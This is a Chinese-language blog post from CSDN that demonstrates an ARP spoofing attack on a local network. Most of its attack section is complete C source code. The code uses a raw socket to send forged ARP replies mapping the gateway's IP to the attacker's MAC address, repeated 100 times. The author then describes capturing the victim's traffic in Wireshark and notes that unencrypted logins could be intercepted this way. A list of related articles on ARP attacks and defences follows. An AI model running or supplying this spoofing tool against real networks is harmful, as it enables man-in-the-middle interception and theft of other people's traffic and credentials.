arp攻击

最新推荐文章于 2023-02-23 20:09:56 发布
最新推荐文章于 2023-02-23 20:09:56 发布
阅读量683 收藏 1
点赞数 2
文章标签: 网络 服务器 macos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012323667/article/details/122401400
版权

上一章讲了arp协议,可以看到非常简单,只有收和发两种格式,没有任何可信认证,采取的是完全信任模式。

若是此时局域网内部有个攻击者呢,那在这种完全信任的模式下攻击者基本可以恣意妄为,现在来模仿下arp攻击。

arp攻击实现

1/假定被攻击的目标此时需要访问互联网,那么必然经过网关。按照前一篇文章的描述,被攻击者首先需要发arp请求广播去询问网关的mac地址。

2/ 攻击者通过不断的给被攻击的目标发送arp响应包。内部伪造网关ip和mac地址的对应关系;在下面的代码中,将网关的mac地址伪造成了攻击者的mac地址,虽然网关会给攻击的目标提供正确的mac地址,但是由于攻击者在不停的发送伪造信息,因此正确的mac地址会被覆盖。

3/最后被攻击的目标将错误的认为攻击者mac地址是网关地址,此时他会将数据发送攻击者这边来,我们通过wireshark来进行捕捉。

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <memory.h>
#include <net/ethernet.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <sys/ioctl.h>
#include <bits/ioctls.h>
#include <string.h>

struct ARP_header
{
    unsigned short    Hardware ;
    unsigned short    Protocol ;
    unsigned char    HardwareAddressLen ;
    unsigned char    ProtocolAddressLeng ;
    unsigned short    Operation ;
    unsigned char    SourceHardareAddr[6] ;
    unsigned char    SourceProtocolAddr[4] ;
    unsigned char    TargetHardareAddr[6] ;
    unsigned char    TargetProtocolAddr[4] ;
};


int main( int argc, char * argv[]) {
    //网卡名字, 这个要改成你自己计算机的网卡名
    unsigned char NetInterface[16] = "wlp4s0";
    struct ARP_header arp_sp;
    arp_sp.Hardware = htons(1);
    arp_sp.Protocol = htons(2048);
    arp_sp.HardwareAddressLen = 6;
    arp_sp.ProtocolAddressLeng = 4;
    arp_sp.Operation = htons(2);

    unsigned char EthernetFrame[64] = {0};
    bzero(EthernetFrame, 64);
    //假数据,发送伪造的网关地址和MAC 这里填本机的mac
    unsigned char Spoofing_MAC[6] = {0Xf8,0X59,0X71,0X10,0X07,0X98};
    unsigned char Spoofing_IP[4] = {192&0Xff,168&0Xff,1&0Xff,1&0XFF};
    //目标的地址和目标的MAC
    unsigned char Target_MAC[6] = { 0Xf8, 0Xff, 0Xc2, 0X18, 0Xe7, 0Xf9};
    unsigned char Target_IP[4] = {192&0Xff,168&0Xff,1&0Xff,2&0Xff};
    //本机的IP地址和MAC地址
    unsigned char Source_MAC[6] = {0Xf8,0X59,0X71,0X10,0X07,0X98};
    unsigned char Source_IP[4] = {192&0Xff,168&0Xff,1&0Xff,5&0Xff};
    //ARP内容
    memcpy(arp_sp.SourceHardareAddr, Spoofing_MAC, sizeof(char)*6);
    memcpy(arp_sp.SourceProtocolAddr, Spoofing_IP, sizeof(char)*4);
    memcpy(arp_sp.TargetHardareAddr, Target_MAC, sizeof(char)*6);
    memcpy(arp_sp.TargetProtocolAddr, Target_IP, sizeof(char)*4);
    //以太网头部
    memcpy(EthernetFrame, Target_MAC, sizeof(char)*6);
    memcpy(EthernetFrame+6, Source_MAC, sizeof(char)*6);
    EthernetFrame[12] = ETH_P_ARP / 256;
    EthernetFrame[13] = ETH_P_ARP % 256;
    //以太网头部和ARP数据连接起来
    memcpy(EthernetFrame+14, &arp_sp, sizeof(char)*28);

    int ARPSocket;
    printf("Create Raw Socket");
    ARPSocket = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if( ARPSocket < 0 ) {
        perror("socket failed");
        exit(1);
    }
    //获取设备
    struct sockaddr_ll device;
    device.sll_ifindex = if_nametoindex((const char*)NetInterface);
    if( device.sll_ifindex == 0 ) {
        perror("sockaddr_ll error");
        exit(1);
    }
    printf("Index of interface %s is %d",NetInterface, device.sll_ifindex);
    device.sll_halen = htons(6);
    device.sll_family = AF_PACKET;
    int i = 0;
    //连续发送100次
    for( i; i<100; i++) {
        int sFd = sendto(ARPSocket, EthernetFrame, 42, 0, (struct sockaddr*)&device, sizeof(device));
        if( sFd <=0 ) {
            perror("sendto failed");
            exit(1);
        }
        sleep(1);
    }

    close(ARPSocket);
}

192.168.1.2是被攻击的目标,它此时正在ping百度(访问外网需要通过网关192.168.1.1)

192.168.1.5是攻击者,它在不停的给192.168.1.2发送假的网关 mac地址,(伪造的数据将网关的ip和192.168.1.5的mac对应起来)

192.168.1.2随着这个假的mac地址将数据发送到了192.168.1.5的设备上

如图是192.168.1.5上面wireshark抓包,可以看到收到了192.168.1.2的ping 36.152.44.95的操作。
如果192.168.1.2正在通过非加密的方式登录账户和密码,那么也是可以被192.168.1.5给抓包抓到。

wireshark

qweeera
关注
ARP欺骗原理及实现,网络安全组件化架构实践
2401_83973995的博客
04-03 1057
1、ARP攻击原理2、ARP欺骗原理四、ARP攻击与欺骗演示五、Windows使用ARP命令六、ARP攻击及欺骗排查和防御1、ARP攻击排查2、ARP攻击防护当主机A要向本局域网上的某台主机B发送IP数据报时,就先在其ARP高速缓存中查看有无主机B的IP地址。如有,就在ARP高速缓存中查出其对应的硬件地址,再把这个硬件地址写入MAC帧,然后通过局域网把该MAC帧发往此硬件地址。也有可能查不到主机B的IP地址的项目,在这种情况下,主机A就自动运行ARP,然后按以下步骤找出主机B的硬件地址:当主机A向B发送数据
ARP攻击的发现,攻击原理,攻击方式,防护
朱海燕的博客日记
01-03 4万+
目录 ARP协议概述 APR攻击发现 ARP攻击过程 攻击方式: arp攻击的防护 ARP协议概述  ARP协议(address resolution protocol)地址解析协议 一台主机和另一台主机通信,要知道目标的IP地址,但是在局域网中传输数据的网卡却不能直接识别IP地址,所以用ARP解析协议将IP地址解 析成MAC地址。ARP协议的基本功能就是通过目标设备的IP地址,...
ARP请求重播攻击
HoukChen的博客
08-20 1753
描述作为产生IVs的最有方法之一,ARP请求重播攻击一直非常稳定可靠。程序先监听一个ARP数据包,再回传给接入点,如此就会使接入点又产生一个新的包含IV的包。然后就以这种方式不断地进行下去,接入点就会一直产生新的IV。前面的文章中也提到过,正是这些IVs帮助我们破解一个网络。什么是ARPARP是地址解析协议(Address Resolution Protocol),用来将IP地址转变为物理地址,如以
网络安全 ❀ ARP攻击
无糖可乐没有灵魂
04-12 670
ARP攻击简述 基本功能 ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的进行。 ARP攻击的局限性 ARP攻击仅能在以太网(局域网如:机房、内网、公司网络等)进行,无法对外网(互联网、非本区域内的局域网)进行攻击ARP攻击的原理 ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发...
ARP协议详解以及arp攻击与防御
dgsds的博客
04-19 5121
目录 什么是ARP ? 为什么既要有IP地址又要有MAC地址? ARP协议属于网络层还是链路层? ARP帧格式 ARP协议工作原理 ARP命令和缓存表 代理ARP和免费ARP ARP协议攻击 ARP协议攻击防御 ​​​​​​​ 什么是ARP ? 将IP地址解析为以太网MAC地址(物理地址)的协议 为什么既要有IP地址又要有MA...
局域网中ARP攻击和浏览器挟持的解决方法
10-01
ARP攻击和浏览器挟持是两种常见的局域网安全问题,主要影响网络的稳定性和用户的数据安全。ARP(Address Resolution Protocol)协议是用来将IP地址映射为MAC地址的机制,这在局域网通信中至关重要。然而,攻击者利用...
巧配交换机防止同网段ARP攻击
10-22
ARP攻击,全称为地址解析协议攻击,是一种常见的网络安全问题,主要通过欺骗局域网内的主机或者网关,让目标主机错误地更新其ARP表项,从而达到截取数据包的目的,或者造成目标主机网络通信中断。ARP攻击的危害主要...
Win7下如何清除arp缓存防止被arp攻击arp欺骗.docx
09-27
Win7下如何清除arp缓存防止被arp攻击arp欺骗 arp缓存是一种高速缓存机制,用于存储近期访问的IP地址和MAC地址的映射关系。然而,这种机制也存在一些安全隐患,攻击者可以通过arp欺骗和arp攻击来获取敏感信息或...
ARP攻击
最新发布
buctwx的博客
02-23 436
ARP安全
什么是 ARP 攻击
布袋和尚
02-18 5936
一、什么是 ARP 1、英文全称:Address Resolution Protocol 。 2、主要功能:将 IP 解析成 MAC 地址。 二、ARP 工作流程 某机器 A 要向主机 B 发送报文,会查询本地的ARP缓存表,找到 B 的 IP 地址对应的 MAC 地址后,就会进行数据传输。 如果未找到,则 A 广播一个 ARP 请求报文(携带主机 A 的 IP 地址 Ia -- 物理地址 Pa),请求 IP 地址为 Ib 的主机 B 回答物理地址 Pb。网上所有主机包括 B 都收到 ARP 请求
ARP欺骗与泛洪
weixin_33935505的博客
11-23 5839
常见的ARP攻击主要有两种,一种是ARP欺骗,攻击者通过发送伪造的ARP报文,恶意修改网关或网络内其他主机的ARP表项,造成用户或网络的报文转发异常。另一种是ARP泛洪攻击,也叫拒绝服务攻击(Denial of Service),攻击者向设备发送大量目的IP地址无法解析的伪造ARP请求报文或免费报文,造成设备上的ARP表项溢出,无法缓存正常用户的ARP表...
ARP断网攻击(详细教程)
Sherrykeeper的博客
12-06 9564
实现原理 ARP攻击仅能在局域网进行,无法对外网进行攻击ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。 准备工作 Kali Linux 镜像 , VMWare WORKSTATION Kail Linux 官网下载地址 安装虚拟机 安装教程 执行攻击 1. 查看本机ip和MAC地址 IP:192.168.1.105 MAC地址
ARP攻击 winpcap
超哥的专栏
04-17 705
ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗。解决办法详见百科 #define ETHER_ADDR_LEN 6 typedef struct { u_char DestMAC[ETHER_ADDR_LEN]; //目的MAC地址 6字节 u_char SourMAC[ETHER_ADDR_LEN]; //源MAC地址 6字节 ...
网络安全-Arp攻击相关
wangyayayaya的专栏
01-11 794
1 名词释义 一、Arp协议 ARP(Address Resolution Protocol)地址解析协议,主要用于IP地址到以太网MAC地址的解析。交换机除了支持动态ARP外,也支持静态配置。此外,在某些应用中,交换机还支持配置代理ARP。如当交换机的接口收到某ARP请求,该请求的IP地址与接口地址在一个IP网段,但却不在同一物理网络中,此时该接口若启动了代理ARP的功能,接口会将自己的MAC地址作为ARP的回应,然后将收到的实际数据报文进行转发。启动代理ARP功能可以使因为物理网络分离但属于同
免费ARPARP欺骗攻击
octopusnju的博客
03-14 2120
以太网ARP报文帧格式: 目的MAC地址 + 源MAC地址 + 帧类型 + 硬件类型 + 协议类型 + 硬件地址长度 + 协议地址长度 + 操作 + 发送端MAC地址 + 发送端IP地址 + 目的MAC地址 + 目的IP地址 (6Bytes) + (6Bytes)+ (2Bytes) + (2Bytes)+ (2Bytes) + (1Bytes)+ (1Bytes) + (2Bytes)+ (
ARP原理和ARP攻击
热门推荐
天行健,君子以自强不息
10-12 10万+
ARP--在TCP/IP协议栈中,最不安全的协议莫过于ARP了,我们经常听到的网络扫描,内网渗透,流量欺骗等等,他们基本上都与ARP有关系,甚至可以说,他们的底层都是基于ARP实现的。但是ARP的是实现仅需一问一答的两个包即可,实现上很简单。 目录 ARP协议 ARP数据包信息 ARP攻击 一、ARP协议 ARP(Address Resolution Protoc...
浅谈局域网ARP攻击的危害及防范方法
IT之道,你我共享!
04-26 1622
自去年5月份开始出现的校内局域网频繁掉线等问题,对正常的教育教学带来了极大的不便,可以说是谈“掉”色变,造成这种现象的情况有很多,但目前最常见的是ARP攻击了。本文介绍了 ARP攻击的原理以及由此引发的网络安全问题,并且结合实际情况,提出在校园网中实施多层次的防范方法,以解决因ARP攻击而引发的网络安全问题,最后介绍了一些实用性较强且操作简单的检测和抵御攻击的有效方法。您是否遇到局域网内频繁性
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值